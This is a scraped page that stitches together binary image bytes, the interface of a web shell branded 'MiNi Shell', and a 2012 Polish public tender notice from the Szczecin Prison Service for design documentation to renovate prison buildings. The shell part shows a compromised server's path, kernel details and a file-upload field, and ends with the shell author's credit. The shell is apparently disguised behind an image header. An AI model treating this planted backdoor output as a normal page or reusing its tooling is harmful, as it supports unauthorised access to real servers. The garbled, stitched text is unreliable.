JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/46768-N-2012.html

<p class="kh_header"><b>Szczecin: Opracowanie kompletnych dokumentacji projektowo-kosztorysowych obejmujących remont kapitalny budynków penitencjarnych  A B oraz budynku administracyjno-biurowego przy ul. Kaszubskiej 28 w Szczecinie wraz z uzyskaniem pozwoleń na budowę</b><br>
<b>Numer ogłoszenia: 46768 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowy Inspektorat Służby Więziennej w Szczecinie , ul. Kaszubska 28, 70-952 Szczecin, woj. zachodniopomorskie, tel. 091 4809101, faks 091 4337075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnych dokumentacji projektowo-kosztorysowych obejmujących remont kapitalny budynków penitencjarnych  A B oraz budynku administracyjno-biurowego przy ul. Kaszubskiej 28 w Szczecinie wraz z uzyskaniem pozwoleń na budowę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo-kosztorysowej obejmującej remont kapitalny budynków penitencjarnych A B oraz budynek administracyjno-biurowy wraz uzyskaniem pozwolenia na budowę
2. Dane liczbowe obiektów podane są załączone audytach energetycznych na w/w budynki		
3.Podstawowe dane do projektowania:
1)wykonanie termomodernizacji budynków penitencjarnych zgodnie z opisem zawartym w audytach energetycznych i zasadami dofinansowania przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie w programie priorytetowym System zielonych inwestycji (GIS-Green Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych
2)utworzenie brakujących węzłów sanitarnych w celach,
3)wymiana instalacji sanitarnych wod.-kan. c.o. c.w.u. i z.w.
4)wymiana instalacji elektrycznej
5)wymiana instalacji niskoprądowych (komputerowa, sygnalizacji włamań i napadu oraz kontroli dostępu, ochrony p.poż.)
6)wymiana drzwi do cel i pomieszczeń służbowych,
7)inne uzgodnienia po uzyskaniu warunków technicznych z przedstawicielem Zamawiającego. 
 Uwaga:
Wykonawca ma obowiązek uzgadniania dokumentacji z przedstawicielem Zamawiającego na każdym etapie, wraz z uzyskaniem na przedłożonych dokumentach jego pisemnej akceptacji.
4.Podstawa opracowania dokumentacji. Przedmiot zamówienia winien być opracowany zgodnie z następującymi przepisami:
5.ustawa z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2006 r., Nr 156 poz. 1118, ze zmianami),
6.Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r., Nr 130 poz. 1389),
7.Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r., Nr 202 poz. 2072, ze  zmianami),
8.Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U.  z 2003 r. Nr 120 poz. 1133),
9.Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75 poz. 690, ze  zmianami),
10.ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759, ze zmianami),
11.Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
12.innymi przepisami techniczno - budowlanymi określonymi w drodze rozporządzeń przez właściwych Ministrów, Polskimi Normami i zasadami wiedzy technicznej.
5.Wykonawca zobowiązany jest w szczególności do:
1)wykonania projektów budowlanych i wykonawczych wszystkich branż, dla każdego budynku i wszystkich branż osobno;
2)wykonania przedmiarów robót dla każdego budynku i wszystkich branż z podziałem na koszty kwalifikowane przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie w programie priorytetowym System zielonych inwestycji (GIS-Green Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych i koszty niekwalifikowane	
3)sporządzenia kosztorysów inwestorskich dla każdego budynku i wszystkich branż z podziałem na koszty kwalifikowane przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie w programie priorytetowym System zielonych inwestycji (GIS-Green Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych i koszty niekwalifikowane;
4)wykonania specyfikacji technicznej wykonania i odbioru robót budowlanych dla każdego budynku  i wszystkich branż;
5)opracowanie informacji dot. Bezpieczeństwa i Ochrony Zdrowia, w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów dla każdego budynku oddzielnie;
6)uzyskania warunków, opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów lub wymagań uprawnionych podmiotów uzgadniających projekty dla każdego budynku;
7)opracowania projektów niezbędnych do uzyskania decyzji pozwolenia na budowę wraz z wystąpieniem i uzyskaniem decyzji pozwolenia na budowę w imieniu Zamawiającego;
8)sporządzenia w formie odrębnego opracowania:
9)opracowania dokumentacji na podstawie wizji odkrywek elementów zakrytych, 
10)uzyskania uzgodnienie dokumentacji z Konserwatorem Zabytków,
11)dokonania uzgodnień bhp, higieniczno - sanitarnych i przeciwpożarowych,

6.Wymagania szczególne dotyczące opracowania dokumentacji projektowo-kosztorysowej oraz pozostałych opracowań:
1)Projekty budowlane i wykonawcze winny być sporządzone w sposób służący Zamawiającemu do zgodnego z ustawą Prawo zamówień publicznych zlecenia realizacji robót budowlanych w szczególności opis przedmiotu zamówienia robót budowlanych zawarty w dokumentacji projektowej musi być zgodny z wymogami przepisów art. 29 i art. 30 ustawy pzp; 

2)Kosztorysy inwestorskie powinny być sporządzone metodą kalkulacji szczególnej, w programie NORMA, którym dysponuje Zamawiający i może w tym programie w trakcie realizacji inwestycji dokonywać aktualizacji, wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 24 stycznia 2004 r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego (Dz. U. z 2004 r. Nr 18, poz. 172), w rozbiciu na poszczególne budynki wszystkich branż z podziałem na koszty kwalifikowane przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie w programie priorytetowym System zielonych inwestycji (GIS-Green Investment Scheme) Część 5) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych i koszty niekwalifikowane;
3)Przedmiary robót powinny być sporządzone na formularzach zawierających:
a)liczbę porządkową pozycji;
b)podstawę ustalenia nakładów rzeczowych (katalog, tablica, pozycja, itp.);
c)podstawę obliczenia ilości (nazwę i numer projektu, rysunku, itp.);
d)szczegółowy opis w danej pozycji i obliczenie ich ilości;
e)jednostki miary;
f)ilość robót (jednostek przedmiarowych) do wykonania;
g)zestawienie ilości robocizny, materiałów i sprzętu bez podania ich cen jednostkowych.
UWAGA! Podawanie w przedmiarze robót tylko wyniku końcowego obliczeń ilości robót jest nieprawidłowe i niedopuszczalne, gdyż uniemożliwia sprawdzenie prawidłowości przedmiaru;
7.Dokumentację będącą przedmiotem zamówienia należy sporządzić w formie:
1)drukowanej, w ilości określonej w ust. 7,
2)elektronicznej - na nośnikach CD (pliki w formatach .pdf - całość dokumentacji oraz w plikach umożliwiających edycję: .kst, .dwg, .doc, .xls), dla każdego budynku penitencjarnego oddzielnie - po 2 szt. 
8.Dokumentację będącą przedmiotem zamówienia należy sporządzić i dostarczyć Zamawiającemu w wersji drukowanej w następujących ilościach:

Projekty budowlane budynków A B oraz budynek administracyjno-biurowy oddzielnie na każdy budynek	po 4 egzemplarzy
Projekt wykonawczy architektury, konstrukcji, instalacji sanitarnych elektrycznych i  niskoprądowych dla budynku penitencjarnego A oddzielniepo 4 egzemplarzy
Projekt wykonawczy architektury, konstrukcji, instalacji sanitarnych elektrycznych i  niskoprądowych dla budynku penitencjarnego B oddzielniepo 4 egzemplarzy
Projekt wykonawczy architektury, konstrukcji, instalacji sanitarnych elektrycznych i  niskoprądowych dla budynku penitencjarnego A ,B  budynek administracyjno-biurowy oddzielnie	po 4 egzemplarzy
Przedmiary robót, we wszystkich branżach i dla każdego budynku A B oraz budynek administracyjno-biurowy oddzielnie po 2 egzemplarzy
Kosztorysy inwestorskie w wersji szczegółowej w programie NORMA, we wszystkich branżach i dla każdego A B oraz budynek administracyjno-biurowy oddzielnie	po 2 egzemplarze
Specyfikacja techniczna wykonania i odbioru robót budowlanych we wszystkich branżach i dla każdego budynku A B oraz budynek administracyjno-biurowy oddzielniepo 4 egzemplarzy
Pozwolenie na budowę dla każdego budynku A B oraz budynek administracyjno-biurowy oddzielnie	 1  egzemplarz

9.Egzemplarze dokumentacji potrzebne do przeprowadzenia wszelkich uzgodnień, uzyskania pozwoleń, itp. Wykonawca sporządza i dostarcza odpowiednio we własnym zakresie oraz na własny koszt.
10.Przedmiot zamówienia musi być opracowany wewnętrznie spójny i skoordynowany we wszystkich branżach.
11.Po uzyskaniu pozwolenia na budowę Zamawiający wymaga od Wykonawcy złożenia oświadczenia o kompletności przygotowanej dokumentacji według wzoru stanowiącego załącznik nr 1 do umowy na wykonanie dokumentacji projektowo-kosztorysowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 Ustala się wadium na całość przedmiotu zamówienia w wysokości: 
         4 000 zł, /słownie: cztery tysięce złotych/.	
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
   a)  pieniądzu
   b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
  c)  gwarancjach bankowych
  d) gwarancjach ubezpieczeniowych
  e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620) 12.3. 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
   Okręgowego Inspektoratu Służby Więziennej w Szczecinie ul. Kaszubska 28     
                      nr  43101015990032161391200000
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku  bankowym.
5. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin   uznania na rachunku  bankowym Zamawiającego.
6. Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany  przez wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem  z ofertą.
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego -   wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji  istotnych warunków zamówienia - następuje jego bezwarunkowa wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta  poręczyciela.
9.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona bez rozpatrywania.
10. Zamawiający zwraca niezwłocznie wadium, jeżeli:
    a)  upłynął termin związania ofertą,
    b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
    c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a odwołania zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

11.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
     a) który wycofał ofertę przed upływem terminu składania ofert,
     b) który został wykluczony z postępowania,
      c) którego oferta została odrzucona.
12.Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia odwołania.  
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
 a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
  b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
  c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe  z przyczyn leżących po stronie wykonawcy. 
14 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
15 Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty złożone przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty złożone przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty złożone przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty złożone przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty złożone przez Wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>posiadania wiedzy i doświadczenia, 
Opis sposobu dokonywania oceny spełniania warunku:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną pracę (usługę) podobną do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna:
a)wykonanie kompletnej dokumentacji projektowo-kosztorysowej na wykonanie nowego budynku wraz z uzyskaniem pozwolenia na budowę w obszarze będącym pod opieką konserwatora zabytków, o wartości nie mniejszej niż 100 000,00 zł brutto 
lub
b)wykonanie kompletnej dokumentacji projektowo-kosztorysowej na wykonanie remontu budynku wraz z niezbędną infrastrukturą i uzyskaniem pozwolenia na budowę w obszarze będącym pod opieką konserwatora zabytków, o wartości nie mniejszej niż 100 000,00 zł brutto.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowy Inspektorat Służby Więziennej w Szczecinie
ul. Kaszubska 28 
70 - 952 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 10:15, miejsce: Okręgowy Inspektorat Służby Więziennej w Szczecinie
ul. Kaszubska 28 
70 - 952 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com